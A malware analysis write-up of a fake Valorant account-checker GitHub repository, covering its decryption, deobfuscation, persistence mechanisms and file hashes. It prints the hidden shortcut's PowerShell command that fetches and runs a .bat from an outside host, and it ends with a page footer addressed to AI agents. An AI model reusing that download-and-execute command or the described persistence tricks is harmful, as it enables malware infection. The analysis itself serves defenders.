# Analysing a malicious github repository ## **Discovery** I came across a github repository that had a somewhat legitimate looking project

{% embed url="" %} It has 143 stars and 54 forks at the time of writting, so it looks believable, but if we take a closer look at the stars and forks:

They are all from fake accounts, created all on the same day practically. Taking a closer look at the other repositories on this account, there is another one that's also backdoored:\ ## Taking a look at the repository code The code is a python and is simulating a account checker for a online game (Valorant). Taking a look at the code, a line jumps out: ```python os.system("start results/save.lnk") ``` This is running a windows shortcut that is on the "results" folder inside the repository. By checking this shortcut, we can see his target: ```powershell %comspec% /C %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden iwr -Uri https://x0.at/18v6.bat -OutFile $env:TEMP\18v6.bat;Start-Process $env:TEMP\18v6.bat ``` This downloads a .bat file from ****, saves it to the temp folder and then runs it. ## Analysing the malware The bat file is massive, having a size of 36mb.

There is a big chunk of base64 defined on the top of the file, we can assume this will probably be our payload, at the end of the file, we see some interesting code:

After removing some repeated words, we can something like this:

It seems the big blob of base64 is encrypted using AES and compressed, by checking this code we can revert the process since we have the KEY and IV to decrypt the data, so I wrote a small powershell script to decrypt it, decompress it and then save it to disk: ```powershell $XseZ='ReadLines'; $yJyL='Load'; $uZpI='GetCurrentProcess'; $dzbX='EntryPoint'; $tPqE='MainModule'; $waZb='FromBase64String'; $XmvD='TransformFinalBlock'; $ENIy='Split'; $gMuk='ElementAt'; $LLuy='CreateDecryptor'; $QCYT='ChangeExtension'; function oaFag($rKNRV){ $Fneio=[System.Security.Cryptography.Aes]::Create(); $Fneio.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Fneio.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Fneio.Key=[System.Convert]::$waZb('DoI1GdINO/odI9JOThyl7401RvkgTfoAX8MQMw24HoM='); $Fneio.IV=[System.Convert]::$waZb('LTCc2yyupcYae/wYTpkiyw=='); $mQSLR=$Fneio.CreateDecryptor(); $ooztA=$mQSLR.$XmvD($rKNRV,0,$rKNRV.Length); $mQSLR.Dispose(); $Fneio.Dispose(); $ooztA; } function tryNE($rKNRV){ $fRenP=New-Object System.IO.MemoryStream(,$rKNRV); $zUkbv=New-Object System.IO.MemoryStream; $gjVsO=New-Object System.IO.Compression.GZipStream($fRenP,[IO.Compression.CompressionMode]::Decompress); $gjVsO.CopyTo($zUkbv);$gjVsO.Dispose(); $fRenP.Dispose(); $zUkbv.Dispose(); $zUkbv.ToArray(); } $c = Get-Content -Path "C:\Users\windows10\Downloads\code.txt" $wlBSz=$c.$ENIy(':'); $gRTVe=tryNE(oaFag ([Convert]::$waZb($wlBSz[0]))); $iRgKa=tryNE(oaFag ([Convert]::$waZb($wlBSz[1]))); [io.file]::WriteAllBytes('C:\Users\windows10\Downloads\f1.bin',$gRTVe); [io.file]::WriteAllBytes('C:\Users\windows10\Downloads\f2.bin',$iRgKa); ``` This gives us two binaries, one of about 27mb and another one of about 28kb, they are both made in .NET. I will start by having a look at the bigger file (27mb), and right of the get go we can see it is highly obfuscated:

The malware is deobfuscating the strings on this method:

With this, we can create our own helper method to deobfuscate the strings outside the code: ```csharp static string Get(string A_0, int A_1, int A_2, int A_3, int A_4, int A_5) { int num = 78787870; if ((-1743288475 ^ 461882411) == -2087697586) { int num2 = num + sizeof(ulong); } StringBuilder stringBuilder = new StringBuilder(); foreach (char c in A_0.ToCharArray()) { stringBuilder.Append((char)((int)c - A_2)); } return stringBuilder.ToString(); } static void Main(string[] args) { Console.WriteLine(Get("", 421592687, -785059054, 1005452607, 940660616, -1106098698)); Console.ReadLine(); } ``` After a few hours of deobfuscating the code, I got it a bit cleaner and tried matching the names with the behaviour:

This malware acts more as a dropper, but it will add exclusions to Windows Defender and add persistence The malware will drop 2 files onto Application Data folder, one named "**OnwbaDTzzU.cmd**" and another named "**OnwbaDTzzU.vbs**" If the malware runs as admin, it creates a scheduler task named "**OneDrive OnwbaDTzzU**", otherwise it creates a registry key named "**OneDrive OnwbaDTzzU**" on "**Software\Microsoft\Windows\CurrentVersion\Run"** pointing to the "**OnwbaDTzzU.vbs**" file

This adds persistence and drops more malware, which we will also have a look at. ## Looking at the dropped malware Before being able to take a look at theresources, I create a little helper method to decompress the resources: ```csharp private static byte[] DecompressGzip(byte[] byteArr) { MemoryStream memoryStream = new MemoryStream(byteArr); MemoryStream memoryStream2 = new MemoryStream(); Stream stream = memoryStream; GZipStream gzipStream = new GZipStream(stream, CompressionMode.Decompress); gzipStream.CopyTo(memoryStream2); gzipStream.Dispose(); memoryStream2.Dispose(); memoryStream.Dispose(); return memoryStream2.ToArray(); } ``` Taking a look at the resource named "P", we can see It's also a .NET assembly, and has some interesting code, this time not obfuscated.

The code is considerable smaller, so it's easier for us to go through it, the line there on the `Assembly.Load()` jumps out, so let's take a look. The method `Fat` defines a memorystream that is then decompressed and returned to the `Assembly.Load()`

Since we cannot see the full memorystream content on dnspy, I change a bit the code, in order to save it to disk instead of loading the assembly

This gives us a very obfuscated .NET DLL

I've extracted another DLL that was hidden the same way, but did not analyse it. Some more information about the other binaries: * WorldOfMythia.exe seems to infect discord installations, but I did not take a good look at it. I looked at other binaries but not in depth, so I will not include it here. ## Conclusion This is a very destructive piece of malware(s) , including a stealer, discord infector and even a crypto miner. I did not have time to analyse every last binary since there are a lot, but I uploaded them all to virustotal and left the associated hashes bellow. While I didn't go into great detail with the analysis, I'm hopeful that someone else will take this to a more in-depth level and analyze some of these binaries ## Indicators | Hash | Assembly | | ---------------------------------------------------------------- | ----------------- | | 585ac7894d8146341ae408121c31ea0f95936e3719683c862a0ec2db2caccb0a | WorldOfMythia.exe | | 34f06a471d1329d2543c5b4df7e2346582279e7789bab518ee9ffc18a6eadf4d | UAC.bin | | 35093cf30e63d1eb7bc8b7cfb39dea2a7f0beb7778a1939b66f0e55910f3da01 | Xmihuj.exe | | f5f25e5e5bc5b827257f0d7f78e2e2f1f6c3cab71dad38d69598055d706e9fee | Qjctluhw\.dll | | 661bca19ee42e61b481a5499cad2f5858940b7cef33dae924cec013dc939da7b | Aeodr.dll | | 1ad4dc2d3c32c156d98e049133dfdc096a6667932613dce21d8f4f659fee5fd4 | 18v6.bat | | 54512dd064c21154462ada0523c7ca88f23ade0313f17b4c7136554fad669fd9 | Uqqjl.exe | | c978dfd73d3c988caa02b70a29eed369709c147066270c2a29c72acc83670b16 | WxpLuq.tmp | | b581309a29cee0fd4a681982688b998178dd5a81bb97d99deb5a2bace6d1dbc5 | Lewfoa.tmp | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://miltonamcs-private-organization.gitbook.io/analysing-a-malicious-github-repository/analysing-a-malicious-github-repository.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.